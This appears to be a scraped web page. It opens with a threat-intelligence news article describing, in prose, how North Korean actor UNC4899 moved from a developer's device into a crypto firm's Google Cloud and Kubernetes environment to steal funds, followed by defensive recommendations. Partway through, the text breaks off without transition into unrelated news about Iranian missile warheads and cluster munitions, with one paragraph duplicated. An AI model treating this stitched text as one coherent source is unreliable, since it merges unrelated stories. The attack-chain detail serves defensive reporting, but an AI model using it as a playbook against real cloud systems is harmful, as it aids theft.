Category: Uncategorized

Ravie LakshmananMar 09, 2026DevOps / Threat Intelligence

The North Korean threat actor known as UNC4899 is suspected to be behind a sophisticated cloud compromise campaign targeting a cryptocurrency organization in 2025 to steal millions of dollars in cryptocurrency.

The activity has been attributed with moderate confidence to the state-sponsored adversary, which is also tracked under the cryptonyms Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor. 

“This incident is notable for its blend of social engineering, exploitation of personal-to-corporate device peer-to-peer data (P2P) transfer mechanisms, workflows, and eventual pivot to the cloud to employ living-off-the-cloud (LOTC) techniques,” the tech giant noted in its H1 2026 Cloud Threat Horizons Report shared with The Hacker News.

Upon gaining access to the cloud environment, the attackers are said to have abused legitimate DevOps workflows to harvest credentials, break out of the confines of containers, and tamper with Cloud SQL databases to facilitate the cryptocurrency theft.

The attack chain, Google Cloud said, represents a progression of what started with the compromise of a developer’s personal device to their corporate workstation, before jumping to the cloud to make unauthorized modifications to the financial logic.

It all started with the threat actors using social engineering ploys to deceive the developer into downloading an archive file as part of a supposed open-source project collaboration. The developer then transferred the same file to their company device over AirDrop.

“Using their AI-assisted Integrated Development Environment (IDE), the victim then interacted with the archive’s contents, eventually executing the embedded malicious Python code, which spawned and executed a binary that masqueraded as the Kubernetes command-line tool,” Google said.

The binary then contacted an attacker-controlled domain and acted as a backdoor to the victim’s corporate machine, giving the attackers a way to pivot to the Google Cloud environment by likely using authenticated sessions and available credentials. This step was followed by an initial reconnaissance phase aimed at gathering information about various services and projects.

The attack moved to the next phase with the discovery of a bastion host, with the adversary modifying its multi-factor authentication (MFA) policy attribute to access it and perform additional reconnaissance, including navigating to specific pods within the Kubernetes environment.

Subsequently, UNC4899 adopted a living-off-the-cloud (LotC) approach to configure persistence mechanisms by altering Kubernetes deployment configurations so as to execute a bash command automatically when new pods are created. The command, for its part, downloaded a backdoor.

Some of the other steps carried out by the threat actor are listed below –

• Kubernetes resources tied to the victim’s CI/CD platform solution were modified to inject commands that displayed the service account tokens onto the logs.
• The attacker obtained a token for a high-privileged CI/CD service account, permitting them to escalate their privileges and conduct lateral movement, specifically targeting a pod that handled network policies and load balancing.
• The stolen service account token was used to authenticate to the sensitive infrastructure pod running in privileged mode, escape the container, and deploy a backdoor for persistent access.
• Another round of reconnaissance was conducted by the threat actor before shifting their attention to a workload responsible for managing customer information, such as user identities, account security, and cryptocurrency wallet information.
• The attacker used it to extract static database credentials that were stored insecurely in the pod’s environment variables.
• The credentials were then abused to access the production database via Cloud SQL Auth Proxy and execute SQL commands to make user account modifications. This included password resets and MFA seed updates for several high-value accounts.
• The attack culminated with the use of the compromised accounts to successfully withdraw several million dollars in digital assets.

The incident “highlights the critical risks posed by the personal-to-corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment,” Google said. “Organizations should adopt a defense-in-depth strategy that rigorously validates identity, restricts data transfer on endpoints, and enforces strict isolation within cloud runtime environments to limit the blast radius of an intrusion event.”

To counter the threat, organizations are advised to implement context-aware access and phishing-resistant MFA, ensure only trusted images are deployed, isolate compromised nodes from establishing connectivity with external hosts, monitor for unexpected container processes, adopt robust secrets management, enforce policies to disable or restrict peer-to-peer file sharing using AirDrop or Bluetooth and mounting of unmanaged external media on corporate devices.

Mousavi added that the “wavelength” and intensity of missile launches will increase, with attacks broadening in scope, according to Iran International.

Iran will only launch missiles with warheads weighing over one ton, Islamic Revolutionary Guard Corps (IRGC) Aerospace Force commander Majid Mousavi said on Monday, according to Iranian opposition outlet Iran International.

To put this in perspective: At the outset of the current conflict with Iran, a missile weighing hundreds of kilograms but less than one ton completely destroyed a building in Tel Aviv.

Mousavi added that the “wavelength” and intensity of missile launches will increase, with attacks broadening in scope, according to Iran International.

Iran, though weakened by US and Israeli strikes, still has a powerful arsenal at its disposal, according to a Wall Street Journal report citing Martin Sampson, former UK defense adviser and leading Middle East military analyst.

These weapons include cruise missiles, cyber warfare, and mines, according to the WSJ, which quoted Sampson as saying that Iran “potentially has the ability to escalate much more broadly” with its current reserve.

Use of cluster munitions in Operation Roaring Lion, and in previous war with Iran

Iran has begun using cluster munitions in recent strikes, resulting in the killing and wounding of Israeli civilians. Cluster munitions are known to be highly destructive; Iran also used them against Israel in the 12-Day War in the summer of 2025.

According to an initial investigation, conducted during the 12-Day War following suspected use of cluster munitions, the missile split into several smaller bombs approximately seven kilometers above the ground, creating an eight-kilometer impact radius when they fell.

Each of the smaller bombs carried around two kilograms of explosives.

Mousavi did not clarify whether or not the heavier warheads would also contain cluster bombs, which can be made in a variety of weight ranges.

Despite Saturday spike in missile sirens, IDF affirms 75% of Iranian missile launchers destroyed

Although there was a spike in Iranian ballistic missile threat sirens on Saturday, sending millions of Israelis into their safe rooms and bomb shelters throughout the day, the IDF said that it had destroyed 75% of Iran’s missile launchers.

The 75% figure is a jump from 65% two days ago.

At the same time, IDF sources have not expressed any certainty about fully stopping Iranian missile fire in the near future.

Yonah Jeremy Bob contributed to this report.